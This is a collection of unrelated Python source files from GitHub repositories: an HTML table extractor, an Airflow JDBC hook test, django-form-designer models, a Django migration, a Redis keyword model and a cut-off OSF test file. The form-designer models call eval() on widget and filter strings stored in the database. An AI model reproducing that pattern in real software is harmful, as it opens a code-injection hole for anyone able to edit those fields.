features["ratio_of_img_tags_to_cells"] = img_count*1.0/tdcount
features["ratio_of_href_tags_to_cells"] = href_count*1.0/tdcount
features["ratio_of_input_tags_to_cells"] = inp_count*1.0/tdcount
features["ratio_of_select_tags_to_cells"] = sel_count*1.0/tdcount
features["ratio_of_colspan_tags_to_cells"] = colspan_count*1.0/tdcount
features["ratio_of_colons_to_cells"] = colon_count*1.0/tdcount
features["avg_cell_len"] = avg_cell_len*1.0/tdcount
features["avg_row_len"] = TableExtraction.mean(row_len_list)
features["avg_row_len_dev"] = avg_row_len_dev*1.0/max(len_row, 1)
avg_col_len = 0
avg_col_len_dev = 0
no_of_cols_containing_num = 0
no_of_cols_empty = 0
if colspan_count == 0.0 and \
len_row != 0 and \
(tdcount/(len_row * 1.0)) == max_tdcount:
col_data = dict()
for i in range(max_tdcount):
col_data['c_{0}'.format(i)] = []
soup_col = BeautifulSoup(table_data, 'html.parser')
for row in soup_col.findAll('tr'):
h_index = 0
h_bool = True
for col in row.findAll('th'):
col_content = ' '.join(col.stripped_strings)
h_bool = False
if col_content is None:
continue
else:
col_data['c_{0}'.format(h_index)].append(col_content)
h_index += 1
d_index = 0
if(h_index == 1 and h_bool == False):
d_index = 1
for col in row.findAll('td'):
col_content = ' '.join(col.stripped_strings)
if col_content is None:
d_index += 1
continue
else:
col_data['c_{0}'.format(d_index)].append(col_content)
d_index += 1
for key, value in col_data.items():
whole_col = ' '.join(value)
# avg_cell_len += float("%.2f" % mean([len(x) for x in value]))
avg_col_len += sum([len(x) for x in value])
avg_col_len_dev += TableExtraction.pstdev([len(x) for x in value])
no_of_cols_containing_num += 1 if TableExtraction.contains_digits(whole_col) is True else 0
# features["column_" + str(key) + "_is_only_num"] = whole_col.isdigit()
no_of_cols_empty += 1 if (whole_col == '') is True else 0
# To avoid division by zero
if max_tdcount == 0:
max_tdcount = 1
features["avg_col_len"] = avg_col_len*1.0/max_tdcount
features["avg_col_len_dev"] = avg_col_len_dev/max_tdcount
features["no_of_cols_containing_num"] = no_of_cols_containing_num
features["no_of_cols_empty"] = no_of_cols_empty
data_table["features"] = features
data_table["rows"] = row_list
context_before = ' '.join(TableExtraction.gen_context(table.find_all_previous(string=True)))
context_after = ' '.join(TableExtraction.gen_context(table.find_all_next(string=True)))
table_rep = TableExtraction.gen_html(row_list)
fingerprint = TableExtraction.create_fingerprint(table_rep)
data_table["context_before"] = context_before
data_table["context_after"] = context_after
data_table["fingerprint"] = fingerprint
data_table['html'] = str(table)
data_table['text'] = TableExtraction.table_to_text(row_list)
result_tables.append(data_table)
table.decompose()
return dict(tables=result_tables, html_text=TableExtraction.text_from_html(soup))
@staticmethod
def create_fingerprint(table):
table = str(table)
all_tokens = list(set(re.split('[^\w]+',table)))
all_tokens = sorted(all_tokens)
fingerprint = '-'.join(all_tokens)
return fingerprint
@staticmethod
def row_to_html(cells):
res = '<html><body><table>'
for i, c in enumerate(cells):
t = c['cell'] if c else ''
res += t + '\n'
res += '</table></body></html>'
return res
@staticmethod
def row_to_text(cells):
res = ''
for i, c in enumerate(cells):
t = c['text'] if c else ''
res += t
if i < len(cells)-1:
res += ' | '
return res
@staticmethod
def table_to_text(rows):
res = ''
for row in rows:
for i, c in enumerate(row['cells']):
t = c['text'] if c else ''
res += t
if i < len(row['cells']) - 1:
res += ' | '
res += '\n'
return res
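    # Illustrative output: for two rows with cell texts ("a", "b") and
    # ("c", "d"), table_to_text() returns "a | b\nc | d\n"; missing (None)
    # cells render as empty strings.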
@staticmethod
def gen_html(row_list):
""" Return html table string from a list of data rows """
table = "<table>"
for row in row_list:
table += "<tr>"
cells = row["cells"]
for c in cells:
t = c['cell'] if c else ''
table += t
table += "</tr>"
table += "</table>"
return table
@staticmethod
def remove_tables(html_doc, min_data_rows = 1):
soup = BeautifulSoup(html_doc, 'html.parser')
tables = soup.findAll('table')
for table in tables:
rows = TableExtraction.is_data_table(table, min_data_rows)
if rows != False:
table.decompose()
return soup
@staticmethod
def tag_visible(element):
if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:
return False
if isinstance(element, Comment):
return False
return True
@staticmethod
def text_from_html(soup):
texts = soup.findAll(text=True)
visible_texts = filter(TableExtraction.tag_visible, texts)
# print([x.strip() for x in visible_texts])
# exit(0)
return u" ".join(t.strip() for t in visible_texts if t.strip() != "")
class TableExtractor(Extractor):
"""
    **Description**
    Extracts data tables from a raw HTML page, returning each table (rows,
    cells, surrounding context, and layout features) as an Extraction.
Examples:
::
table_extractor = TableExtractor()
table_extractor.extract(html=html_str,
return_text=True)
"""
def __init__(self) -> None:
Extractor.__init__(self,
input_type=InputType.TEXT,
category="content",
name="DigTableExtractor")
self.tableExtractorInstance = TableExtraction()
def _wrap_value_with_context(self, value: dict or str, field_name: str, start: int=0, end: int=0) -> Extraction:
"""Wraps the final result"""
return Extraction(value, self.name, start_token=start, end_token=end, tag=field_name)
def extract(self, html: str, return_text: bool = False, expand_merged_cells: bool = True) -> List[Extraction]:
"""
Args:
html (str): raw html of the page
return_text (bool): if True, return the visible text in the page
removing all the data tables
Returns:
List[Extraction]: a list of Extractions
"""
results = list()
temp_res = self.tableExtractorInstance.extract(html, expand_merged_cells=expand_merged_cells)
if return_text:
results.append(self._wrap_value_with_context(temp_res['html_text'], "text_without_tables"))
results.extend(map(lambda t: self._wrap_value_with_context(t, "tables"), temp_res['tables']))
return results
| {
"content_hash": "24721fa90d70fd09e5cac327a5872f4d",
"timestamp": "",
"source": "github",
"line_count": 624,
"max_line_length": 116,
"avg_line_length": 41.306089743589745,
"alnum_prop": 0.4663045586808923,
"repo_name": "usc-isi-i2/etk",
"id": "49db728651e1677148881c1145fd6863aaddbd8e",
"size": "25799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "etk/extractors/table_extractor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "4590"
},
{
"name": "HTML",
"bytes": "1048891"
},
{
"name": "Julia",
"bytes": "874347"
},
{
"name": "Jupyter Notebook",
"bytes": "123779"
},
{
"name": "Makefile",
"bytes": "601"
},
{
"name": "Python",
"bytes": "807682"
},
{
"name": "Shell",
"bytes": "259"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import json
import os
from unittest.mock import Mock, patch
import pytest
from pytest import param
from airflow.models import Connection
from airflow.providers.jdbc.hooks.jdbc import JdbcHook
from airflow.utils import db
jdbc_conn_mock = Mock(name="jdbc_conn")
class TestJdbcHook:
def setup_method(self):
db.merge_conn(
Connection(
conn_id="jdbc_default",
conn_type="jdbc",
host="jdbc://localhost/",
port=443,
extra=json.dumps(
{
"extra__jdbc__drv_path": "/path1/test.jar,/path2/t.jar2",
"extra__jdbc__drv_clsname": "com.driver.main",
}
),
)
)
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect", autospec=True, return_value=jdbc_conn_mock)
def test_jdbc_conn_connection(self, jdbc_mock):
jdbc_hook = JdbcHook()
jdbc_conn = jdbc_hook.get_conn()
assert jdbc_mock.called
assert isinstance(jdbc_conn, Mock)
assert jdbc_conn.name == jdbc_mock.return_value.name
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect")
def test_jdbc_conn_set_autocommit(self, _):
jdbc_hook = JdbcHook()
jdbc_conn = jdbc_hook.get_conn()
jdbc_hook.set_autocommit(jdbc_conn, False)
jdbc_conn.jconn.setAutoCommit.assert_called_once_with(False)
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect")
def test_jdbc_conn_get_autocommit(self, _):
jdbc_hook = JdbcHook()
jdbc_conn = jdbc_hook.get_conn()
jdbc_hook.get_autocommit(jdbc_conn)
jdbc_conn.jconn.getAutoCommit.assert_called_once_with()
@pytest.mark.parametrize(
"uri",
[
param(
"a://?extra__jdbc__drv_path=abc&extra__jdbc__drv_clsname=abc",
id="prefix",
),
param("a://?drv_path=abc&drv_clsname=abc", id="no-prefix"),
],
)
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect")
def test_backcompat_prefix_works(self, mock_connect, uri):
with patch.dict(os.environ, {"AIRFLOW_CONN_MY_CONN": uri}):
hook = JdbcHook("my_conn")
hook.get_conn()
mock_connect.assert_called_with(
jclassname="abc",
url="",
driver_args=["None", "None"],
jars="abc".split(","),
)
@patch("airflow.providers.jdbc.hooks.jdbc.jaydebeapi.connect")
def test_backcompat_prefix_both_prefers_short(self, mock_connect):
with patch.dict(
os.environ,
{"AIRFLOW_CONN_MY_CONN": "a://?drv_path=non-prefixed&extra__jdbc__drv_path=prefixed"},
):
hook = JdbcHook("my_conn")
hook.get_conn()
mock_connect.assert_called_with(
jclassname=None,
url="",
driver_args=["None", "None"],
jars="non-prefixed".split(","),
)
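# Illustrative (hypothetical) environment-variable connection following the
# same pattern the parametrized tests exercise above -- Airflow parses the
# URI query string into the connection extras consumed by JdbcHook:
#
#   export AIRFLOW_CONN_MY_CONN='jdbc://user:pass@host:5432/db?drv_path=/opt/drivers/postgresql.jar&drv_clsname=org.postgresql.Driver'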
| {
"content_hash": "470e991ea335277f0c8e17fa9d647635",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 110,
"avg_line_length": 34.26373626373626,
"alnum_prop": 0.5599743425272611,
"repo_name": "apache/airflow",
"id": "50913b023769bd4c3bc68aac437d49d81d246ecb",
"size": "3905",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tests/providers/jdbc/hooks/test_jdbc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "71458"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "172957"
},
{
"name": "JavaScript",
"bytes": "143915"
},
{
"name": "Jinja",
"bytes": "38911"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "23697738"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "211306"
},
{
"name": "TypeScript",
"bytes": "521019"
}
],
"symlink_target": ""
} |
from django.db import models
from django.utils.translation import ugettext, ugettext_lazy as _
from django.forms import widgets
from django.core.mail import send_mail
from django.conf import settings
from form_designer import app_settings
import re
from form_designer.pickled_object_field import PickledObjectField
from form_designer.model_name_field import ModelNameField
from form_designer.template_field import TemplateTextField, TemplateCharField
#==============================================================================
class FormDefinition(models.Model):
"""
A model that defines a form and its components and properties.
"""
name = models.SlugField(_('Name'), max_length=255, unique=True)
title = models.CharField(_('Title'), max_length=255, blank=True, null=True)
action = models.URLField(_('Target URL'), help_text=_('If you leave this empty, the page where the form resides will be requested, and you can use the mail form and logging features. You can also send data to external sites: For instance, enter "http://www.google.ch/search" to create a search form.'), max_length=255, blank=True, null=True)
    mail_to = TemplateCharField(_('Send form data to e-mail address'), help_text=_('Separate several addresses with a comma. Your form fields are available as template context. Example: "[email protected], {{ from_email }}" if you have a field named `from_email`.'), max_length=255, blank=True, null=True)
    mail_from = TemplateCharField(_('Sender address'), max_length=255, help_text=_('Your form fields are available as template context. Example: "{{ first_name }} {{ last_name }} <{{ from_email }}>" if you have fields named `first_name`, `last_name`, `from_email`.'), blank=True, null=True)
    mail_subject = TemplateCharField(_('e-Mail subject'), max_length=255, help_text=_('Your form fields are available as template context. Example: "Contact form {{ subject }}" if you have a field named `subject`.'), blank=True, null=True)
method = models.CharField(_('Method'), max_length=10, default="POST", choices = (('POST', 'POST'), ('GET', 'GET')))
success_message = models.CharField(_('Success message'), max_length=255, blank=True, null=True)
error_message = models.CharField(_('Error message'), max_length=255, blank=True, null=True)
submit_label = models.CharField(_('Submit button label'), max_length=255, blank=True, null=True)
log_data = models.BooleanField(_('Log form data'), help_text=_('Logs all form submissions to the database.'), default=True)
success_redirect = models.BooleanField(_('Redirect after success'), help_text=_('You should install django_notify if you want to enable this.') if not 'django_notify' in settings.INSTALLED_APPS else None, default=False)
success_clear = models.BooleanField(_('Clear form after success'), default=True)
allow_get_initial = models.BooleanField(_('Allow initial values via URL'), help_text=_('If enabled, you can fill in form fields by adding them to the query string.'), default=True)
message_template = TemplateTextField(_('Message template'), help_text=_('Your form fields are available as template context. Example: "{{ message }}" if you have a field named `message`. To iterate over all fields, use the variable `data` (a list containing a dictionary for each form field, each containing the elements `name`, `label`, `value`).'), blank=True, null=True)
form_template_name = models.CharField(_('Form template'), max_length=255, choices=app_settings.get('FORM_DESIGNER_FORM_TEMPLATES'), blank=True, null=True)
#--------------------------------------------------------------------------
class Meta:
verbose_name = _('form')
verbose_name_plural = _('forms')
#--------------------------------------------------------------------------
    def get_field_dict(self):
        fields = {}
        for field in self.fields.all():
            fields[field.name] = field
        return fields
#--------------------------------------------------------------------------
def get_form_data(self, form):
data = []
field_dict = self.get_field_dict()
form_keys = form.fields.keys()
def_keys = field_dict.keys()
for key in form_keys:
if key in def_keys and field_dict[key].include_result:
value = form.cleaned_data[key]
if getattr(value, '__form_data__', False):
value = value.__form_data__()
data.append({'name': key, 'label': form.fields[key].label, 'value': value})
return data
#--------------------------------------------------------------------------
    def get_form_data_dict(self, form_data):
        data = {}
        for field in form_data:
            data[field['name']] = field['value']
        return data
#--------------------------------------------------------------------------
def compile_message(self, form_data, template=None):
from django.template.loader import get_template
from django.template import Context, Template
if template:
t = get_template(template)
elif not self.message_template:
t = get_template('txt/formdefinition/data_message.txt')
else:
t = Template(self.message_template)
context = Context(self.get_form_data_dict(form_data))
context['data'] = form_data
return t.render(context)
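    # A minimal sketch of how compile_message() consumes get_form_data()
    # output, assuming a definition with a single hypothetical `message` field:
    #
    #   form_data = [{'name': 'message', 'label': 'Message', 'value': 'hi'}]
    #   defn.message_template = 'Got: {{ message }} ({{ data|length }} field(s))'
    #   defn.compile_message(form_data)  # -> u'Got: hi (1 field(s))'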
#--------------------------------------------------------------------------
def count_fields(self):
return self.fields.count()
count_fields.short_description = _('Fields')
#--------------------------------------------------------------------------
def __unicode__(self):
return self.title or self.name
#--------------------------------------------------------------------------
def log(self, form):
"""
Saves the form submission.
"""
form_data = self.get_form_data(form)
field_dict = self.get_field_dict()
# create a submission
submission = FormSubmission()
submission.save()
# log each field's value individually
for field_data in form_data:
field_submission = FormFieldSubmission(submission=submission, definition_field=field_dict[field_data['name']],
value=field_data['value'])
field_submission.save()
return submission
#--------------------------------------------------------------------------
def string_template_replace(self, text, context_dict):
from django.template import Context, Template, TemplateSyntaxError
try:
t = Template(text)
return t.render(Context(context_dict))
except TemplateSyntaxError:
return text
#--------------------------------------------------------------------------
    def send_mail(self, form):
        form_data = self.get_form_data(form)
        message = self.compile_message(form_data)
        context_dict = self.get_form_data_dict(form_data)
        # `re` and django.core.mail.send_mail are already imported at module level
        mail_to = re.compile(r'\s*[,;]+\s*').split(self.mail_to)
        for key, email in enumerate(mail_to):
            mail_to[key] = self.string_template_replace(email, context_dict)
        mail_from = self.mail_from or None
        if mail_from:
            mail_from = self.string_template_replace(mail_from, context_dict)
        if self.mail_subject:
            mail_subject = self.string_template_replace(self.mail_subject, context_dict)
        else:
            mail_subject = self.title
        import logging
        logging.debug('Mail: %r --> %r', mail_from, mail_to)
        send_mail(mail_subject, message, mail_from or None, mail_to, fail_silently=False)
#--------------------------------------------------------------------------
@property
def submit_flag_name(self):
name = app_settings.get('FORM_DESIGNER_SUBMIT_FLAG_NAME') % self.name
while self.fields.filter(name__exact=name).count() > 0:
name += '_'
return name
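    # e.g. with FORM_DESIGNER_SUBMIT_FLAG_NAME = '%s_submit' (a hypothetical
    # setting value) and a form named 'contact' that already defines a field
    # called 'contact_submit', this yields 'contact_submit_' -- underscores
    # are appended until the flag no longer clashes with a field name.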
#--------------------------------------------------------------------------
    def to_field_list(self):
        """
        Converts this form definition into a list of dictionaries, each
        dictionary representing a field and its components.
        """
        field_arr = []
        # run through all of the fields associated with this definition
        for field in self.fields.all():
            choices = []
            if field.choices.count():
                choices = [{'value': u'%s' % choice.value, 'label': u'%s' % choice.label} for choice in field.choices.all()]
            elif field.choice_model:
                choices = [{'value': u'%s' % obj.id, 'label': u'%s' % obj} for obj in ModelNameField.get_model_from_string(field.choice_model).objects.all()]
            field_item = {
                'name': u'%s' % field.name,
                'label': u'%s' % field.label,
                'class': u'%s' % field.field_class,
                'position': u'%s' % field.position,
                'widget': u'%s' % field.widget,
                'initial': u'%s' % field.initial,
                'help_text': u'%s' % field.help_text,
            }
            if choices:
                field_item['choices'] = choices
            field_arr.append(field_item)
        return field_arr
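    # Shape of the returned list, for one hypothetical choice field:
    #   [{'name': u'color', 'label': u'Color', 'class': u'forms.ChoiceField',
    #     'position': u'0', 'widget': u'', 'initial': u'', 'help_text': u'',
    #     'choices': [{'value': u'r', 'label': u'Red'}]}]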
#==============================================================================
class FormDefinitionFieldChoice(models.Model):
"""
A single choice available for a form definition field.
"""
label = models.TextField(_('Label'), help_text=_('A descriptive value for the choice'), blank=True, null=True)
value = models.TextField(_('Value'), help_text=_('The value of the choice when submitting the form'), blank=True, null=True)
#--------------------------------------------------------------------------
def __unicode__(self):
return u'%s (%s)' % (self.label, self.value)
#==============================================================================
class FieldChoiceContainer(object):
def __init__(self, value='', label=''):
self.value = value
self.label = label
#==============================================================================
class FormDefinitionField(models.Model):
"""
A single field within a form definition.
"""
form_definition = models.ForeignKey(FormDefinition, verbose_name=_('Form definition'), related_name='fields')
field_class = models.CharField(_('Field class'), choices=app_settings.get('FORM_DESIGNER_FIELD_CLASSES'), max_length=32)
position = models.IntegerField(_('Position'), blank=True, null=True)
name = models.SlugField(_('Name'), max_length=255)
label = models.CharField(_('Label'), max_length=255, blank=True, null=True)
required = models.BooleanField(_('Required'), default=True)
include_result = models.BooleanField(_('Include in result'), help_text=('If this is disabled, the field value will not be included in logs and e-mails generated from form data.'), default=True)
widget = models.CharField(_('Widget'), default='', choices=app_settings.get('FORM_DESIGNER_WIDGET_CLASSES'), max_length=255, blank=True, null=True)
initial = models.TextField(_('Initial value'), blank=True, null=True)
help_text = models.CharField(_('Help text'), max_length=255, blank=True, null=True)
# the new model
choices = models.ManyToManyField(FormDefinitionFieldChoice, verbose_name=_('Choices'), help_text=_('The various options from which the user can choose'), blank=True, null=True)
max_length = models.IntegerField(_('Max. length'), blank=True, null=True)
min_length = models.IntegerField(_('Min. length'), blank=True, null=True)
max_value = models.FloatField(_('Max. value'), blank=True, null=True)
min_value = models.FloatField(_('Min. value'), blank=True, null=True)
max_digits = models.IntegerField(_('Max. digits'), blank=True, null=True)
decimal_places = models.IntegerField(_('Decimal places'), blank=True, null=True)
regex = models.CharField(_('Regular Expression'), max_length=255, blank=True, null=True)
choice_model_choices = app_settings.get('FORM_DESIGNER_CHOICE_MODEL_CHOICES')
choice_model = ModelNameField(_('Data model'), max_length=255, blank=True, null=True, choices=choice_model_choices, help_text=_('your_app.models.ModelName' if not choice_model_choices else None))
choice_model_empty_label = models.CharField(_('Empty label'), max_length=255, blank=True, null=True)
#--------------------------------------------------------------------------
    def save(self, *args, **kwargs):
        if self.position is None:
            self.position = 0
        super(FormDefinitionField, self).save(*args, **kwargs)
#--------------------------------------------------------------------------
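    # NOTE: intentionally disabled via the extra underscores -- as written it
    # would clobber field values with its keyword defaults every time Django
    # instantiates the model from the database, so do not rename it back.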
def ____init__(self, field_class=None, name=None, required=None, widget=None, label=None, initial=None, help_text=None, *args, **kwargs):
super(FormDefinitionField, self).__init__(*args, **kwargs)
self.name = name
self.field_class = field_class
self.required = required
self.widget = widget
self.label = label
self.initial = initial
self.help_text = help_text
#--------------------------------------------------------------------------
    def get_choices(self, filter=None, order_by=None):
        queryset = None
        if self.field_class in ('forms.ModelChoiceField', 'forms.ModelMultipleChoiceField'):
            manager = ModelNameField.get_model_from_string(self.choice_model).objects
            if filter:
                # `filter` arrives as a serialized queryset call such as
                # "filter(active=True)"; evaluating it as an expression also
                # works on Python 3, unlike exec-assignment into function locals
                queryset = eval('manager.%s' % filter)
            else:
                queryset = manager.all()
            if order_by:
                queryset = queryset.order_by(order_by)
            return [FieldChoiceContainer(value=item.id, label=item.title) for item in queryset]
        else:
            return self.choices.order_by('value')
#--------------------------------------------------------------------------
def get_form_field_init_args(self):
args = {
'required': self.required,
'label': self.label if self.label else '',
'initial': self.initial if self.initial else None,
'help_text': self.help_text,
}
if self.field_class in ('forms.CharField', 'forms.EmailField', 'forms.RegexField'):
args.update({
'max_length': self.max_length,
'min_length': self.min_length,
})
if self.field_class in ('forms.IntegerField', 'forms.DecimalField'):
args.update({
'max_value': int(self.max_value) if self.max_value != None else None,
'min_value': int(self.min_value) if self.min_value != None else None,
})
if self.field_class == 'forms.DecimalField':
args.update({
'max_value': self.max_value,
'min_value': self.min_value,
'max_digits': self.max_digits,
'decimal_places': self.decimal_places,
})
if self.field_class == 'forms.RegexField':
if self.regex:
args.update({
'regex': self.regex
})
if self.field_class in ('forms.ChoiceField', 'forms.MultipleChoiceField'):
#print "Choices count:", self.choices.count()
if self.choices.count():
# new method of creating choices
choices = [(choice.value, choice.label) for choice in self.choices.all()]
args.update({
'choices': tuple(choices)
})
#print "Choices:", choices
if self.field_class in ('forms.ModelChoiceField', 'forms.ModelMultipleChoiceField'):
args.update({
'queryset': ModelNameField.get_model_from_string(self.choice_model).objects.all()
})
if self.field_class == 'forms.ModelChoiceField':
args.update({
'empty_label': self.choice_model_empty_label
})
if self.widget:
args.update({
'widget': eval(self.widget)()
})
return args
#--------------------------------------------------------------------------
class Meta:
verbose_name = _('field')
verbose_name_plural = _('fields')
ordering = ['position']
#--------------------------------------------------------------------------
def __unicode__(self):
return self.label if self.label else self.name
#==============================================================================
class FormSubmission(models.Model):
"""
Represents a single submission of a particular type of form definition.
"""
    created = models.DateTimeField(_('Created'), auto_now_add=True)
#--------------------------------------------------------------------------
class Meta:
verbose_name = _('form submission')
verbose_name_plural = _('form submissions')
ordering = ['-created']
#--------------------------------------------------------------------------
def __unicode__(self):
form_definition = self.form_definition
# if this submission has fields attached to it
if form_definition:
return u'%s at %s' % (form_definition, self.created)
else:
return u'Empty submission at %s' % self.created
#--------------------------------------------------------------------------
@property
def form_definition(self):
return self.fields.all()[0].definition_field.form_definition if self.fields.count() else None
#==============================================================================
class FormFieldSubmission(models.Model):
"""
Represents the content of a single submission's field.
"""
submission = models.ForeignKey(FormSubmission, verbose_name=_('Form submission'), help_text=_('The submission to which this particular submission component belongs'),
related_name='fields')
definition_field = models.ForeignKey(FormDefinitionField, verbose_name=_('Form definition field'),
help_text=_('The field in the form definition to which this submitted value belongs'),
related_name='submissions')
value = models.TextField(_('Value'), help_text=_('The actual submitted value'))
#--------------------------------------------------------------------------
def __unicode__(self):
value = u'%s' % self.value
truncated_value = value if len(value) < 10 else value[:10]+'...'
return u'%s: %s (%s)' % (self.definition_field, u'%s=%s' % (truncated_value, self.choice_label) if self.choice_label else truncated_value, self.submission)
#--------------------------------------------------------------------------
@property
def choice_label(self):
"""
Retrieves the label of the choice made by the user, should this
submission's field be linked to a set of choices.
TODO: Account for model choice fields.
"""
        try:
            # get the first choice that matches the available ones
            choice = self.definition_field.choices.filter(value=self.value)[0]
        except IndexError:
            return None
return u'%s' % choice.label
#==============================================================================
if 'cms' in settings.INSTALLED_APPS:
from cms.models import CMSPlugin
class CMSFormDefinition(CMSPlugin):
form_definition = models.ForeignKey(FormDefinition, verbose_name=_('Form'))
def __unicode__(self):
return self.form_definition.__unicode__()
| {
"content_hash": "2651da72192f69733de6c788a468f8f4",
"timestamp": "",
"source": "github",
"line_count": 458,
"max_line_length": 377,
"avg_line_length": 44.52838427947598,
"alnum_prop": 0.5389330195155437,
"repo_name": "praekelt/django-form-designer",
"id": "862d6d7bdc9c8fa87bbc2aa14ed43c58c0ee731a",
"size": "20394",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "form_designer/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('sitecheck', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ApiClientState',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('sleep_until', models.DateTimeField(null=True)),
('max_concurrent_assessments', models.IntegerField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RequestLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('datetime', models.DateTimeField(auto_now_add=True)),
('uuid', models.UUIDField(max_length=32)),
('request_url', models.CharField(max_length=1000)),
('request_headers', models.TextField()),
('request_body', models.TextField(null=True)),
('response_code', models.IntegerField(null=True)),
('response_headers', models.TextField(null=True)),
('response_body', models.TextField(null=True)),
('sitecheck', models.ForeignKey(related_name='requestlogs', to='sitecheck.SiteCheck', null=True, on_delete=models.PROTECT)),
],
options={
'ordering': ['-datetime'],
},
bases=(models.Model,),
),
]
| {
"content_hash": "074b597bc9d1808f502c874f12e69084",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 140,
"avg_line_length": 39.26829268292683,
"alnum_prop": 0.5347826086956522,
"repo_name": "tykling/tlsscout",
"id": "a1cc9947dad048239c7d846e50b93b810d030594",
"size": "1636",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/ssllabs/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52"
},
{
"name": "HTML",
"bytes": "47251"
},
{
"name": "Python",
"bytes": "79561"
}
],
"symlink_target": ""
} |
import logging
from doodle.config import CONFIG
from doodle.core.property import IntegerProperty, StringProperty
from doodle.core.redis_client import redis_cache_client
from .base_model import JSONModel
class KeywordArticle(JSONModel):
keywords = StringProperty()
article_id = IntegerProperty()
def _get_watching_keys(self, inserting=False):
return [self.KEY]
def _save_self(self, redis_client, inserting=False):
member = '%s:%d' % (self.keywords, self.article_id)
redis_client.sadd(self.KEY, member)
def delete(self, redis_client):
member = '%s:%d' % (self.keywords, self.article_id)
redis_client.srem(self.KEY, member)
@classmethod
def query_by_keyword(cls, keyword, result_limit=CONFIG.SEARCH_PAGE_SIZE, search_limit=CONFIG.MAX_SEARCH_COUNT):
cache_key = 'KeywordArticles:' + keyword
cached_result = redis_cache_client.get(cache_key)
if cached_result is not None:
if not cached_result:
return []
try:
article_ids = cached_result.split(',')
return [int(article_id) for article_id in article_ids]
except ValueError:
logging.warning('Key "%s" contains wrong value: %s', cache_key, cached_result)
redis_cache_client.delete(cache_key)
pattern = '*%s*:*' % keyword.lower()
cursor, members = cls.redis_client.sscan(cls.KEY, match=pattern, count=search_limit)
if members:
article_ids = [member.rsplit(':', 1)[-1] for member in members[:result_limit]]
result = [int(article_id) for article_id in article_ids]
else:
article_ids = result = []
redis_cache_client.set(cache_key, ','.join(article_ids), ex=CONFIG.DEFAULT_CACHE_TIME)
return result
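    # A minimal usage sketch (persistence details live in JSONModel; the
    # keyword and article id are illustrative):
    #
    #   KeywordArticle(keywords='Python redis', article_id=42).save()
    #   KeywordArticle.query_by_keyword('redis')  # sscan match -> [42]
    #   KeywordArticle.query_by_keyword('redis')  # second call hits the cache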
| {
"content_hash": "960481cde0ac790163379f274e539c26",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 115,
"avg_line_length": 37.53061224489796,
"alnum_prop": 0.6302338227297444,
"repo_name": "keakon/Doodle",
"id": "1c3e4b60b760a917f64869badc26e0447f7b250e",
"size": "1864",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doodle/core/models/keyword.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "42340"
},
{
"name": "Dockerfile",
"bytes": "396"
},
{
"name": "HTML",
"bytes": "29675"
},
{
"name": "JavaScript",
"bytes": "60604"
},
{
"name": "Python",
"bytes": "174982"
}
],
"symlink_target": ""
} |
from django.apps import AppConfig
class SocialAppConfig(AppConfig):
name = "social"
def ready(self):
        import social.signals
| {
"content_hash": "fe661f5042bacdeafc23ce233c6d426b",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 33,
"avg_line_length": 17.625,
"alnum_prop": 0.7021276595744681,
"repo_name": "eyohansa/temu",
"id": "beb6626b0cdbf805c46fe92591f10934bca81f0a",
"size": "141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "social/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "817"
},
{
"name": "HTML",
"bytes": "16452"
},
{
"name": "JavaScript",
"bytes": "2806"
},
{
"name": "Python",
"bytes": "20802"
}
],
"symlink_target": ""
} |
import pytest
from api.base.settings.defaults import API_BASE
from osf_tests.factories import (
RegistrationProviderFactory,
AuthUserFactory
)
from django.contrib.auth.models import Group
from osf.models import RegistrationSchema
from waffle.models import Flag
from osf.migrations import update_provider_auth_groups
from osf.features import EGAP_ADMINS
@pytest.mark.django_db
class TestRegistrationProviderSchemas:
@pytest.fixture()
def user(self):
return AuthUserFactory()
@pytest.fixture()
def egap_flag(self):
flag = Flag.objects.get(name='egap_admins')
flag.everyone = True
flag.save()
return flag
@pytest.fixture()
def schema(self):
return RegistrationSchema.objects.get(name='Prereg Challenge', schema_version=2)
@pytest.fixture()
def egap_schema(self):
return RegistrationSchema.objects.get(name='EGAP Registration', schema_version=3)
@pytest.fixture()
def out_dated_schema(self):
reg_schema = RegistrationSchema(name='Prereg Challenge', schema_version=1)
reg_schema.save()
return reg_schema
@pytest.fixture()
def invisible_schema(self):
reg_schema = RegistrationSchema(name='Test Schema (Invisible)', schema_version=1, visible=False)
reg_schema.save()
return reg_schema
@pytest.fixture()
def inactive_schema(self):
reg_schema = RegistrationSchema(name='Test Schema (Inactive)', schema_version=1, active=False)
reg_schema.save()
